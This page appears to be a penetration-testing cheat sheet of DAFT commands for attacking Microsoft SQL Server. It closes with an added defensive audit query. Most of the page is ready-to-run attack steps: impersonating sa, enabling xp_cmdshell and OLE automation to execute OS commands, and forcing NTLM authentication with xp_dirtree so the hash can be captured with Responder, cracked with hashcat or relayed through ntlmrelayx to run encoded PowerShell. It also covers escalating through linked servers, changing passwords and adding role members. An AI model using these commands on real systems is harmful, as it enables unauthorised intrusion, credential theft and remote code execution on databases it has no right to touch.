AJ-Labz
DAFT Commands

Generic Info

daft.exe -i <SQL SERVER> -d master -m query -q "select system_user;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT LEFT(@@version, CHARINDEX(' - ', @@version)) ProductName;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT IS_SRVROLEMEMBER('sysadmin');"

List Databases and Owners

DAFT.exe -i <SQL SERVER> -d master -m Database | findstr "DatabaseName DatabaseOwner"

Checks for some Excessive Privileges, only found Database Ownership Chaining

DAFT.exe -i <SQL SERVER> -d master -m AuditPrivDbChaining

Basic server information

DAFT.exe -i <SQL SERVER> -d master -m ServerInfo

Lists links

DAFT.exe -i <SQL SERVER> -d master -m ServerLink

Link crawling

DAFT.exe -i <SQL SERVER> -d master -m ServerLinkCrawl

Lists granted permissions

DAFT.exe -i <SQL SERVER> -d master -m ServerPriv

Lists sysadmins

DAFT.exe -i <SQL SERVER> -d master -m ServerRoleMember

Using specific DB Creds

daft.exe -i <SQL SERVER> -d master -e USER:PASSWORD -m query -q "EXEC ('xp_cmdshell ''whoami'';') AT <SQL SERVER>;"

Impersonation

daft.exe -i <SQL SERVER> -d msdb -m query -q "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Found this one as well; not certain of the exact output

daft.exe -i <SQL SERVER> -d music -m query -q "SELECT grantee_principal.name AS WhoCanImpersonate ,grantee_principal.type_desc AS ImpersonatorType ,sp.name AS WhoCanTheyImpersonate ,sp.type_desc AS ImpersonateeLoginType FROM sys.server_permissions AS prmssn INNER JOIN sys.server_principals AS sp ON sp.principal_id = prmssn.major_id AND prmssn.class = 101 INNER JOIN sys.server_principals AS grantee_principal ON grantee_principal.principal_id = prmssn.grantee_principal_id WHERE prmssn.state = 'G'"

Change a user's password

daft.exe -i <SQL SERVER> -d master -m query -q "ALTER LOGIN sqlUsername WITH PASSWORD = N'qwer1234QWER!@#$';"

OLE Stored Procedure

daft.exe -i <SQL SERVER> -d master -e 'USERNAME:PASSWORD' -m query -q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null,'ping 192.168.49.59'"

XP cmd shell

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'show advanced options', 1; reconfigure;"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'xp_cmdshell', 1; reconfigure;"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC xp_cmdshell 'whoami';"

COMMAND EXECUTION - LOCAL - XP COMMAND SHELL

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'ipconfig';"

UNC Injection

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master..xp_dirtree '\\192.168.X.Y\test';"

Capture the NTLM hash

Set up Responder and capture the NTLM hash

responder -I tun0

Crack it with hashcat

hashcat -m 5600 sqlsvc_hash.txt /usr/share/wordlists/rockyou.txt --force

Relay hash for code execution

impacket ntlmrelay

python3 ntlmrelayx.py --no-http-server -smb2support -t 172.16.98.152 -c 'powershell -enc <ENCODED COMMAND>'

DAFT Built in CMD Execution

daft.exe -i "<SQL SERVER>" -m OSCmd -q whoami

Linked PrivEsc

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''xp_cmdshell ''''whoami'''';'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

Linked Servers XP cmd shell

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('xp_cmdshell ''<COMMAND>'';') AT <SQL SERVER>;"

Linked Servers xp cmd shell - openquery

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC master..xp_cmdshell ''whoami'';')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT * FROM OPENQUERY([<SQL SERVER>],'SELECT @@SERVERNAME, SYSTEM_USER')"

Add Linked Login

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedserver @server = N'<SQL SERVER>', @provider=N'SQLNCLI', @datasrc=N'<SQL SERVER>';"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedsrvlogin @rmtsrvname = N'<SQL SERVER>', @locallogin = NULL, @useself = N'False', @rmtuser=N'asdf', @rmtpassword=N'asdfasdfasdf';"

@useself must be 'False' for @rmtuser/@rmtpassword to be used; with 'True' the mapping reuses the caller's own login and the supplied credentials are ignored.

ALTER Role cmd

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('ALTER ROLE db_owner ADD MEMBER aids;') AT <SQL SERVER>;"

Enable RPC

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption '<SQL SERVER>', 'rpc out', 'true'; EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQL SERVER>;"
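The settings and grants every section of this page depends on, collected into one review query. This is an added defender-side example, not part of the original cheat sheet or of DAFT; run it as sysadmin on the instance being reviewed and treat every non-empty result set as a finding to remediate.

```sql
-- Added audit query (not from the original page). Each section surfaces one of
-- the conditions the commands above rely on; run as sysadmin.

-- 1. Server options: value_in_use = 1 means the feature is enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- 2. Linked servers; is_rpc_out_enabled = 1 is what EXEC (...) AT needs.
SELECT name, data_source, provider, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 3. Linked-server login mappings: a remote_name with uses_self_credential = 0
--    is a stored credential; uses_self_credential = 1 passes the caller through.
SELECT s.name AS linked_server,
       COALESCE(sp.name, '(all logins)') AS local_login,
       l.remote_name, l.uses_self_credential
FROM sys.linked_logins AS l
JOIN sys.servers AS s ON s.server_id = l.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = l.local_principal_id
WHERE s.is_linked = 1;

-- 4. Logins allowed to impersonate other logins (class 101 = server principal).
SELECT grantee.name AS grantee, target.name AS can_impersonate, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101 AND p.permission_name = 'IMPERSONATE' AND p.state IN ('G', 'W');

-- 5. Databases with ownership chaining on, with their owner. Chaining plus a
--    shared owner (typically sa) is the condition behind the AuditPrivDbChaining
--    check above.
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner, d.is_db_chaining_on
FROM sys.databases AS d
WHERE d.is_db_chaining_on = 1
   OR EXISTS (SELECT 1 FROM sys.configurations
              WHERE name = 'cross db ownership chaining' AND value_in_use = 1);

-- 6. Current sysadmin members; compare against the expected DBA list.
SELECT m.name AS sysadmin_member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';
```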

Last updated 3 years ago